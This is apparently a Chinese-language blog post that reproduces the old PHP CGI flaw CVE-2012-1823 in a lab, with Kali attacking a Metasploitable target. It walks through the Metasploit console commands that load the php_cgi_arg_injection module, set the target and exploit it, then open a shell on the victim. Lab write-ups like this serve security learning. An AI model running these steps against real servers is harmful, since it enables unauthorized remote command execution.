CVE-2012-1823:PHP CGI漏洞利用
PHP CGI漏洞利用
今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞
使用工具:攻击机kali linux、靶机metasploitable linux
具体步骤如下:
1.登入msfconsloe
2.搜索漏洞代号,输入 search cve:2012-1823
3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0
详细如下:
msf > use exploit/multi/http/php_cgi_arg_injection
或者
msf > use 0
4.进行相关设置
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141
rhosts => 192.168.30.141
msf6 exploit(multi/http/php_cgi_arg_injection) >
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
5.开始攻击
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限
meterpreter > shell
本文来自博客园,作者:白帽子鸣歌,转载请注明原文链接:https://www.cnblogs.com/luuxiaoming/p/16589781.html
分类:
安全渗透
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】